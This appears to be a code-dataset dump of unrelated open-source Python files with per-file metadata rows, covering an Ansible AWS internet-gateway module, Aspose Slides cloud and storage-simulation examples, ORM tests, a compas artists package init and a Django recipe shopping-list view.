if isinstance(inp, MutableSequence):
for idx, value in enumerate(inp):
inp[idx] = bytes2str_in_dicts(value)
return inp
# if value is bytes, return decoded string,
elif isinstance(inp, bytes):
return inp.decode('utf-8')
# simply return elements itself
return inp
def visit_class(rec, cls, op):
# type: (Any, Iterable, Union[Callable[..., Any], partial[Any]]) -> None
"""Apply a function to with "class" in cls."""
if isinstance(rec, MutableMapping):
if "class" in rec and rec.get("class") in cls:
op(rec)
for d in rec:
visit_class(rec[d], cls, op)
if isinstance(rec, MutableSequence):
for d in rec:
visit_class(d, cls, op)
def visit_field(rec, field, op):
# type: (Any, Iterable, Union[Callable[..., Any], partial[Any]]) -> None
"""Apply a function to mapping with 'field'."""
if isinstance(rec, MutableMapping):
if field in rec:
rec[field] = op(rec[field])
for d in rec:
visit_field(rec[d], field, op)
if isinstance(rec, MutableSequence):
for d in rec:
visit_field(d, field, op)
def random_outdir(): # type: () -> Text
""" Return the random directory name chosen to use for tool / workflow output """
# compute this once and store it as a function attribute - each subsequent call will return the same value
if not hasattr(random_outdir, 'outdir'):
random_outdir.outdir = '/' + ''.join([random.choice(string.ascii_letters) for _ in range(6)]) # type: ignore
return random_outdir.outdir # type: ignore
| apache-2.0 | -1,387,636,412,206,536,700 | 33.289916 | 117 | 0.610587 | false | 3.853163 | false | false | false |
madgik/exareme | Exareme-Docker/src/exareme/exareme-tools/madis/src/functionslocal/aggregate/linearregressionresultsviewer.py | 1 | 2533 | # class linearregressionresultsviewer:
# registered = True # Value to define db operator
#
# def __init__(self):
# self.n = 0
# self.mydata = dict()
# self.variablenames = []
#
# def step(self, *args):
# # if self.n == 0:
# # print args, len(args)
# # self.noofvariables = args[4]
# # self.noofclusters = args[5]
# try:
# self.variablenames.append(str(args[0]))
# self.mydata[(args[0])] = str(args[1]), str(args[2]), str(args[3]), str(args[4])
# self.n += 1
# # if self.n <= self.noofvariables :
# # self.variablenames.append(str(args[1]))
# except (ValueError, TypeError):
# raise
#
# def final(self):
# yield ('linearregressionresult',)
#
# myresult = "{\"resources\": [{\"name\": \"linear-regression\", \"profile\": \"tabular-data-resource\", \
# \"data\": [[\"variable\", \"estimate\", \"standard_error\", \"t-value\", \"p-value\"]"
# if len(self.variablenames) != 0:
# myresult += ","
# for i in xrange(len(self.variablenames)):
# myresult += "[\"" + str(self.variablenames[i]) + "\","
# # row=[]
# # row.append(self.variablenames[i])
# for j in xrange(4):
# myresult += "\"" + str(self.mydata[(self.variablenames[i])][j]) + "\""
# if j < 3:
# myresult += ","
# # row.append(self.mydata[(self.variablenames[i])][j])
# # myresult+= str(row)
# if i < len(self.variablenames) - 1:
# myresult += "],"
#
# if len(self.variablenames) != 0:
# myresult += "]"
#
# myresult += "],\"schema\": { \"fields\": [{\"name\": \"variable\", \"type\": \"string\"}, \
# {\"name\": \"estimate\", \"type\": \"number\"},{\"name\": \"standard_error\", \"type\": \"number\"}, \
# {\"name\": \"t-value\", \"type\": \"number\"}, {\"name\": \"p-value\", \"type\": \"string\"}] } }]}"
#
# yield (myresult,)
#
#
# if not ('.' in __name__):
# """
# This is needed to be able to test the function, put it at the end of every
# new function you create
# """
# import sys
# from functions import *
#
# testfunction()
# if __name__ == "__main__":
# reload(sys)
# sys.setdefaultencoding('utf-8')
# import doctest
#
# doctest.testmod()
| mit | 1,042,671,281,403,169,500 | 36.80597 | 122 | 0.459929 | false | 3.324147 | false | false | false |
dimid/ansible-modules-extras | cloud/amazon/ec2_vpc_igw.py | 15 | 4625 | #!/usr/bin/python
#
# This is a free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This Ansible library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: ec2_vpc_igw
short_description: Manage an AWS VPC Internet gateway
description:
- Manage an AWS VPC Internet gateway
version_added: "2.0"
author: Robert Estelle (@erydo)
options:
vpc_id:
description:
- The VPC ID for the VPC in which to manage the Internet Gateway.
required: true
default: null
state:
description:
- Create or terminate the IGW
required: false
default: present
choices: [ 'present', 'absent' ]
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Ensure that the VPC has an Internet Gateway.
# The Internet Gateway ID can be accessed via {{igw.gateway_id}} for use in setting up NATs etc.
ec2_vpc_igw:
vpc_id: vpc-abcdefgh
state: present
register: igw
'''
try:
import boto.ec2
import boto.vpc
from boto.exception import EC2ResponseError
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
if __name__ != '__main__':
raise
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import AnsibleAWSError, connect_to_aws, ec2_argument_spec, get_aws_connection_info
class AnsibleIGWException(Exception):
pass
def ensure_igw_absent(vpc_conn, vpc_id, check_mode):
igws = vpc_conn.get_all_internet_gateways(
filters={'attachment.vpc-id': vpc_id})
if not igws:
return {'changed': False}
if check_mode:
return {'changed': True}
for igw in igws:
try:
vpc_conn.detach_internet_gateway(igw.id, vpc_id)
vpc_conn.delete_internet_gateway(igw.id)
except EC2ResponseError as e:
raise AnsibleIGWException(
'Unable to delete Internet Gateway, error: {0}'.format(e))
return {'changed': True}
def ensure_igw_present(vpc_conn, vpc_id, check_mode):
igws = vpc_conn.get_all_internet_gateways(
filters={'attachment.vpc-id': vpc_id})
if len(igws) > 1:
raise AnsibleIGWException(
'EC2 returned more than one Internet Gateway for VPC {0}, aborting'
.format(vpc_id))
if igws:
return {'changed': False, 'gateway_id': igws[0].id}
else:
if check_mode:
return {'changed': True, 'gateway_id': None}
try:
igw = vpc_conn.create_internet_gateway()
vpc_conn.attach_internet_gateway(igw.id, vpc_id)
return {'changed': True, 'gateway_id': igw.id}
except EC2ResponseError as e:
raise AnsibleIGWException(
'Unable to create Internet Gateway, error: {0}'.format(e))
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
vpc_id = dict(required=True),
state = dict(default='present', choices=['present', 'absent'])
)
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
if not HAS_BOTO:
module.fail_json(msg='boto is required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if region:
try:
connection = connect_to_aws(boto.vpc, region, **aws_connect_params)
except (boto.exception.NoAuthHandlerFound, AnsibleAWSError) as e:
module.fail_json(msg=str(e))
else:
module.fail_json(msg="region must be specified")
vpc_id = module.params.get('vpc_id')
state = module.params.get('state', 'present')
try:
if state == 'present':
result = ensure_igw_present(connection, vpc_id, check_mode=module.check_mode)
elif state == 'absent':
result = ensure_igw_absent(connection, vpc_id, check_mode=module.check_mode)
except AnsibleIGWException as e:
module.fail_json(msg=str(e))
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | -2,129,451,769,415,334,400 | 28.272152 | 112 | 0.646919 | false | 3.688198 | false | false | false |
kovernik/python_training_new | test/add_contact_to_group.py | 1 | 1071 | from model.contact import Contact
from model.group import Group
from fixture.orm import ORMFixture
import random
db = ORMFixture(host='127.0.0.1', name='addressbook', user='root', password='')
def test_add_contact_to_group(app):
old_groups = db.get_group_list()
if len(old_groups) == 0:
app.group.create(Group(name="New_group"))
groups = db.get_group_list()
group = random.choice(groups)
old_contacts_in_group = db.get_contacts_in_group(group)
if len(db.get_contact_list()) == 0 or len(db.get_contact_list()) == len(old_contacts_in_group):
app.contact.fill_new(Contact(firstname="NEWSContact"))
contacts = db.get_contacts_not_in_group(group)
contact = random.choice(contacts)
app.contact.add_contact_in_group(contact, group)
new_contact_in_group = db.get_contacts_in_group(group)
assert len(old_contacts_in_group) + 1 == len(new_contact_in_group)
old_contacts_in_group.append(contact)
assert sorted(old_contacts_in_group, key=Contact.id_or_max) == sorted(new_contact_in_group, key=Contact.id_or_max)
| apache-2.0 | 888,426,471,953,180,500 | 43.625 | 118 | 0.699346 | false | 3.095376 | false | false | false |
vialette/ultrastorage | ultrastorage/storagesystem/homogeneousstoragesystem.py | 1 | 4026 | # coding=utf-8
"""Homogeneous storage system.
.. moduleauthor:: Stéphane Vialette <[email protected]>
"""
from .storagesystem import StorageSystem
from .storagesystemsnapshotcontroller import SuspendedStorageSystemSnapshotController
from .storagesystemexception import StorageSystemException
class HomogeneousStorageSystem(StorageSystem):
# storage system type
TYPE = "homogeneous"
def __init__(self, capacity, cpu, transfer_time_manager, name=None):
"""Initialize this homogeneous storage system.
:param capacity: The capacity of each storage unit of this storage system.
:type capacity: Numeric.
        :param cpu: The number of cpu of each storage unit of this storage system.
:type cpu: int.
"""
super(self.__class__, self).__init__(transfer_time_manager, name)
# capacity
if capacity <= 0:
raise StorageSystemException("non-positive capacity '{}'".format(capacity))
self._capacity = capacity
# cpu
if cpu <= 0:
raise StorageSystemException("non-positive cpu '{}'".format(cpu))
if not isinstance(cpu, int):
raise StorageSystemException("non-integer cpu '{}'".format(cpu))
self._cpu = cpu
@property
def capacity(self):
"""Return the capacity of each storage unit.
"""
return self._capacity
@property
def cpu(self):
"""Return the number of cpu of each storage unit.
"""
return self._cpu
def add_storage_unit(self, environment, storage_unit_name = None):
"""Add a new storage unit to this storage system.
"""
return super(self.__class__, self).add_storage_unit(environment, self.capacity, self.cpu, storage_unit_name)
def homogeneous_storage_system_builder(environment, number_of_storage_units, capacity, cpu, transfer_time_manager,
name=None,
storage_unit_names = None):
"""Convenient function to create an homogeneous storage system.
:param number_of_storage_units: The number of storage units to be created.
:type number_of_storage_units: int.
:param capacity: The capacity of each storage unit.
:type capacity: Numeric.
    :param cpu: The number of cpu of each storage unit.
:type cpu: int.
:param name: An optional name for this storage system.
:type name: string.
:param storage_unit_names: An optional list of names for the storage units.
:type storage_unit_names: [string].
"""
# number of storage units
if not isinstance(number_of_storage_units, int):
raise StorageSystemException("non-integer number of storage units")
if number_of_storage_units < 0:
raise StorageSystemException("negative number of storage units")
# take care of storage unit names
if storage_unit_names is not None:
if len(storage_unit_names) != number_of_storage_units:
msg = "bad number of storage unit names, expected {} got {}".format(number_of_storage_units, len(storage_unit_names))
raise StorageSystemException(msg)
# create the storage system
homogeneous_storage_system = HomogeneousStorageSystem(capacity, cpu, transfer_time_manager, name)
# suspend the storage system snapshot controller while we are adding
# the storage units.
with SuspendedStorageSystemSnapshotController(homogeneous_storage_system):
# add the storage units to the storage system
for i in range(number_of_storage_units):
storage_unit_name = None
if storage_unit_names is not None:
storage_unit_name = storage_unit_names[i]
homogeneous_storage_system.add_storage_unit(environment, storage_unit_name)
# let the snapshot controller know about the new storage units
homogeneous_storage_system.force_snapshot(environment)
# return back to the caller the new storage system
return homogeneous_storage_system
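# Minimal usage sketch (illustrative; environment and transfer_time_manager must
# come from the surrounding simulation code, and the argument values are made up):
#
#   system = homogeneous_storage_system_builder(
#       environment, number_of_storage_units=4, capacity=100, cpu=2,
#       transfer_time_manager=transfer_time_manager, name="cluster")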
| mit | 7,335,059,450,182,258,000 | 36.971698 | 129 | 0.668571 | false | 4.394105 | false | false | false |
compas-dev/compas | src/compas_ghpython/artists/__init__.py | 1 | 1774 | """
********************************************************************************
artists
********************************************************************************
.. currentmodule:: compas_ghpython.artists
.. rst-class:: lead
Artists for visualising (painting) COMPAS objects with GHPython.
Artists convert COMPAS objects to Rhino geometry and data.
.. code-block:: python
pass
----
Geometry Artists
================
.. autosummary::
:toctree: generated/
:nosignatures:
CircleArtist
FrameArtist
LineArtist
PointArtist
PolylineArtist
Datastructure Artists
=====================
.. autosummary::
:toctree: generated/
:nosignatures:
MeshArtist
NetworkArtist
VolMeshArtist
Robot Artist
============
.. autosummary::
:toctree: generated/
:nosignatures:
RobotModelArtist
Base Classes
============
.. autosummary::
:toctree: generated/
:nosignatures:
BaseArtist
PrimitiveArtist
ShapeArtist
"""
from __future__ import absolute_import
from ._artist import BaseArtist
from ._primitiveartist import PrimitiveArtist
from ._shapeartist import ShapeArtist
from .circleartist import CircleArtist
from .frameartist import FrameArtist
from .lineartist import LineArtist
from .pointartist import PointArtist
from .polylineartist import PolylineArtist
from .meshartist import MeshArtist
from .networkartist import NetworkArtist
from .volmeshartist import VolMeshArtist
from .robotmodelartist import RobotModelArtist
__all__ = [
'BaseArtist',
'PrimitiveArtist',
'ShapeArtist',
'CircleArtist',
'FrameArtist',
'LineArtist',
'PointArtist',
'PolylineArtist',
'MeshArtist',
'NetworkArtist',
'VolMeshArtist',
'RobotModelArtist'
]
| mit | -7,449,057,773,028,017,000 | 17.102041 | 80 | 0.631905 | false | 4.23389 | false | false | false |
emacsway/ascetic | ascetic/tests/test_relations.py | 1 | 4696 | import unittest
from ascetic import validators
from ascetic.databases import databases
from ascetic.models import Model
from ascetic.relations import ForeignKey
Author = Book = None
class TestCompositeRelation(unittest.TestCase):
maxDiff = None
create_sql = {
'postgresql': """
DROP TABLE IF EXISTS ascetic_composite_author CASCADE;
CREATE TABLE ascetic_composite_author (
id integer NOT NULL,
lang VARCHAR(6) NOT NULL,
first_name VARCHAR(40) NOT NULL,
last_name VARCHAR(40) NOT NULL,
bio TEXT,
PRIMARY KEY (id, lang)
);
DROP TABLE IF EXISTS ascetic_composite_book CASCADE;
CREATE TABLE ascetic_composite_book (
id integer NOT NULL,
lang VARCHAR(6) NOT NULL,
title VARCHAR(255),
author_id integer,
PRIMARY KEY (id, lang),
FOREIGN KEY (author_id, lang) REFERENCES ascetic_composite_author (id, lang) ON DELETE CASCADE
);
""",
'mysql': """
DROP TABLE IF EXISTS ascetic_composite_author CASCADE;
CREATE TABLE ascetic_composite_author (
id INT(11) NOT NULL,
lang VARCHAR(6) NOT NULL,
first_name VARCHAR(40) NOT NULL,
last_name VARCHAR(40) NOT NULL,
bio TEXT,
PRIMARY KEY (id, lang)
);
DROP TABLE IF EXISTS ascetic_composite_book CASCADE;
CREATE TABLE ascetic_composite_book (
id INT(11) NOT NULL,
lang VARCHAR(6) NOT NULL,
title VARCHAR(255),
author_id INT(11),
PRIMARY KEY (id, lang),
FOREIGN KEY (author_id, lang) REFERENCES ascetic_composite_author (id, lang)
);
""",
'sqlite3': """
DROP TABLE IF EXISTS ascetic_composite_author;
CREATE TABLE ascetic_composite_author (
id INTEGER NOT NULL,
lang VARCHAR(6) NOT NULL,
first_name VARCHAR(40) NOT NULL,
last_name VARCHAR(40) NOT NULL,
bio TEXT,
PRIMARY KEY (id, lang)
);
DROP TABLE IF EXISTS ascetic_composite_book;
CREATE TABLE ascetic_composite_book (
id INTEGER NOT NULL,
lang VARCHAR(6) NOT NULL,
title VARCHAR(255),
author_id INT(11),
PRIMARY KEY (id, lang),
FOREIGN KEY (author_id, lang) REFERENCES ascetic_composite_author (id, lang)
);
"""
}
@classmethod
def create_models(cls):
class Author(Model):
class Mapper(object):
db_table = 'ascetic_composite_author'
defaults = {'bio': 'No bio available'}
validations = {'first_name': validators.Length(),
'last_name': (validators.Length(), lambda x: x != 'BadGuy!' or 'Bad last name', )}
class Book(Model):
author = ForeignKey(Author, related_field=('id', 'lang'), field=('author_id', 'lang'), related_name='books')
class Mapper(object):
db_table = 'ascetic_composite_book'
return locals()
@classmethod
def setUpClass(cls):
db = databases['default']
db.cursor().execute(cls.create_sql[db.engine])
for model_name, model in cls.create_models().items():
globals()[model_name] = model
def setUp(self):
db = databases['default']
db.identity_map.disable()
for table in ('ascetic_composite_author', 'ascetic_composite_book'):
db.execute('DELETE FROM {0}'.format(db.qn(table)))
def test_model(self):
author = Author(
id=1,
lang='en',
first_name='First name',
last_name='Last name',
)
self.assertIn('first_name', dir(author))
self.assertIn('last_name', dir(author))
author.save()
author_pk = (1, 'en')
author = Author.get(author_pk)
self.assertEqual(author.pk, author_pk)
book = Book(
id=5,
lang='en',
title='Book title'
)
book.author = author
book.save()
book_pk = (5, 'en')
book = Book.get(book_pk)
self.assertEqual(book.pk, book_pk)
self.assertEqual(book.author.pk, author_pk)
author = Author.get(author_pk)
self.assertEqual(author.books[0].pk, book_pk)
| mit | 7,920,552,640,540,147,000 | 33.277372 | 120 | 0.525128 | false | 4.304308 | false | false | false |
aspose-slides/Aspose.Slides-for-Cloud | Examples/Python/DeleteAllSlidesFromPowerPointPresentationThirdPartyStorage.py | 2 | 1567 | import asposeslidescloud
from asposeslidescloud.SlidesApi import SlidesApi
from asposeslidescloud.SlidesApi import ApiException
import asposestoragecloud
from asposestoragecloud.StorageApi import StorageApi
from asposestoragecloud.StorageApi import ResponseMessage
apiKey = "XXXXX" #sepcify App Key
appSid = "XXXXX" #sepcify App SID
apiServer = "http://api.aspose.com/v1.1"
data_folder = "../../../data/"
#Instantiate Aspose Storage API SDK
storage_apiClient = asposestoragecloud.ApiClient.ApiClient(apiKey, appSid, True)
storageApi = StorageApi(storage_apiClient)
#Instantiate Aspose Slides API SDK
api_client = asposeslidescloud.ApiClient.ApiClient(apiKey, appSid, True)
slidesApi = SlidesApi(api_client);
#set input file name
name = "sample-input.pptx"
storage = "AsposeDropboxStorage"
try:
#upload file to 3rd party cloud storage
response = storageApi.PutCreate(name, data_folder + name, storage=storage)
#invoke Aspose.Slides Cloud SDK API to delete all slides from a presentation
response = slidesApi.DeleteSlidesCleanSlidesList(name, storage=storage)
if response.Status == "OK":
#download presentation from 3rd party cloud storage
response = storageApi.GetDownload(Path=name, storage=storage)
outfilename = "c:/temp/" + name
with open(outfilename, 'wb') as f:
for chunk in response.InputStream:
f.write(chunk)
except ApiException as ex:
print "ApiException:"
print "Code:" + str(ex.code)
print "Message:" + ex.message
| mit | -7,580,811,026,189,730,000 | 34.613636 | 80 | 0.72559 | false | 3.482222 | false | false | false |
blacksph3re/alastair | cooking/shopping_list/shopping_list.py | 1 | 7304 | import math
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Layout, Submit, Button, Field, Hidden, HTML, Div
from crispy_forms.bootstrap import FormActions, AppendedText, StrictButton, InlineField
from django import forms
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import resolve, reverse
from django.db import models
from django.db.models import F, ExpressionWrapper, FloatField, IntegerField, CharField, Case, When, Sum, Func, Min, Q
from django.shortcuts import render, redirect
from django.utils.encoding import python_2_unicode_compatible
from cooking.helpers import prepareContext
from cooking.models import Ingredient
from cooking.inventory.inventory import inventory_data, add_to_inventory
def project_shopping_list_data(proj):
return Ingredient.objects.filter(receipe__meal__project=proj).annotate(
# Copy ri.measurement for easier access
measurement=F('receipe_ingredient__measurement'),
# Also copy ri.remarks for easier access
mr_remarks=F('receipe_ingredient__remarks'),
# Exact price = (mr.person_count / r.default_person_count) * i.price
exact_price_tmp=ExpressionWrapper((F('receipe__meal_receipe__person_count') / F('receipe__default_person_count')) * F('price'), output_field=FloatField()),
exact_amount_tmp=Case(
When(buying_measurement=F('receipe_ingredient__measurement'),
then=(F('receipe_ingredient__amount') / F('receipe__default_person_count')) * F('receipe__meal_receipe__person_count')),
When(calculation_measurement=F('receipe_ingredient__measurement'),
then=(((F('receipe_ingredient__amount') / F('calculation_quantity')) * F('buying_quantity')) / F('receipe__default_person_count')) * F('receipe__meal_receipe__person_count')),
default=0,
output_field=FloatField()),
exact_calculation_amount_tmp=Case(
When(calculation_measurement__isnull=True,
then=None),
When(buying_measurement=F('receipe_ingredient__measurement'),
then=(((F('receipe_ingredient__amount') / F('buying_quantity')) * F('calculation_quantity')) / F('receipe__default_person_count')) * F('receipe__meal_receipe__person_count')),
When(calculation_measurement=F('receipe_ingredient__measurement'),
then=(F('receipe_ingredient__amount') / F('receipe__default_person_count')) * F('receipe__meal_receipe__person_count')),
default=None,
output_field=FloatField()),
).annotate(
exact_amount=Sum('exact_amount_tmp'),
first_occurrence=Min('receipe__meal__time'),
).annotate(
exact_calculation_amount=Case(When(calculation_measurement__isnull=False, then=F('exact_amount') / F('buying_quantity') * F('calculation_quantity')),
default=None,
output_field=FloatField()),
exact_buying_count=(F('exact_amount') / F('buying_quantity')),
buying_count=Func((F('exact_amount') / F('buying_quantity')) + 0.5, function='ROUND'),
).annotate(
effective_amount=F('buying_count') * F('buying_quantity'),
effective_calculation_amount=F('buying_count') * F('calculation_quantity'),
effective_price=ExpressionWrapper(F('buying_count') * F('price'), output_field=FloatField()),
#).values('first_occurrence', 'name', 'id', 'buying_measurement', 'buying_quantity', 'calculation_measurement', 'calculation_quantity', 'exact_amount', 'exact_calculation_amount', 'effective_amount', 'effective_calculation_amount', 'remarks', 'effective_price', 'buying_count', 'price'
)
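# Subtract what is already booked in the project inventory from the shopping
# list, recompute the derived amounts and prices, and drop items that are
# fully covered by the inventory.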
def subtract_inventory(proj, shopping_list):
inventory = list(inventory_data(proj))
sl = list(shopping_list)
for item in sl:
for inv in (x for x in inventory if x.ingredient.id == item.id):
# Subtract the buying count
item.exact_buying_count -= inv.exact_buying_count
#print('Subtracting ' + str(inv.amount) + inv.measurement + ' from ' + item.name)
#inventory.remove(inv) # for optimization remove this element
# Recalculate all the other properties
# I most propably forgot something here
item.exact_amount = item.exact_buying_count * item.buying_quantity
if(item.calculation_measurement):
item.exact_calculation_amount = item.exact_buying_count * item.calculation_quantity
item.buying_count = math.ceil(item.exact_buying_count)
item.effective_amount = item.buying_count * item.buying_quantity
if(item.calculation_measurement):
item.effective_calculation_amount = item.buying_count * item.calculation_quantity
item.effective_price = item.buying_count * float(item.price)
return [x for x in sl if x.exact_buying_count > 0.000001]
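# Shopping list view: honours the per-session inventory toggle, optionally
# books the remaining items into the inventory, and renders the listing page.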
@login_required
def project_shopping_list(request):
context = prepareContext(request)
if('active_project' not in context):
return redirect('cooking:projects')
if('activate_inventory' in request.GET):
request.session['inventory_active'] = True
elif('deactivate_inventory' in request.GET):
request.session['inventory_active'] = False
elif('inventory_active' not in request.session):
request.session['inventory_active'] = True
if(request.session['inventory_active']):
if('send_to_inventory' in request.GET):
sl = project_shopping_list_data(context['active_project'])
sl = subtract_inventory(context['active_project'], sl)
for item in sl:
add_to_inventory(context['active_project'], item)
context['shopping_list'] = project_shopping_list_data(context['active_project'])
if(request.session['inventory_active']):
context['shopping_list'] = subtract_inventory(context['active_project'], context['shopping_list'])
#context['total_exact_price'] = context['shopping_list'].aggregate(tp=Sum('exact_price')).get('tp')
context['total_effective_price'] = sum([float(x.effective_price) for x in context['shopping_list']])
context['pagetitle'] = 'Shopping List'
context['inventory_active'] = request.session['inventory_active']
return render(request, 'listings/shopping_list.html', context)
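# CSV export of the shopping list, applying the same inventory handling as
# the HTML view.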
@login_required
def project_shopping_list_csv(request):
context = prepareContext(request)
if('active_project' not in context):
return redirect('cooking:projects')
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = 'attachment; filename="shoppinglist.csv"'
writer = UnicodeWriter(response)
writer.writerow(['First Use', 'Ingredient', 'Exact Amount 1', '', 'Exact Amount 2', '', 'Effective Amount 1', '', 'Effective Amount 2', '', 'Buying Count', 'Effective Price', 'Remarks'])
if('inventory_active' not in request.session):
request.session['inventory_active'] = True
shoppinglist = project_shopping_list_data(context['active_project'])
if(request.session['inventory_active']):
shoppinglist = subtract_inventory(context['active_project'], shoppinglist)
for item in shoppinglist:
if(item.exact_amount > 0):
writer.writerow([item.first_occurrence,
item.name,
item.exact_amount,
conv_measurement(item.buying_measurement, item.exact_amount),
item.exact_calculation_amount,
conv_measurement(item.calculation_measurement, item.exact_calculation_amount),
item.effective_amount,
conv_measurement(item.buying_measurement, item.effective_amount),
item.effective_calculation_amount,
conv_measurement(item.calculation_measurement, item.effective_calculation_amount),
item.buying_count,
item.effective_price,
item.remarks])
return response
| gpl-2.0 | -7,200,600,426,151,556,000 | 49.722222 | 287 | 0.730559 | false | 3.378353 | false | false | false |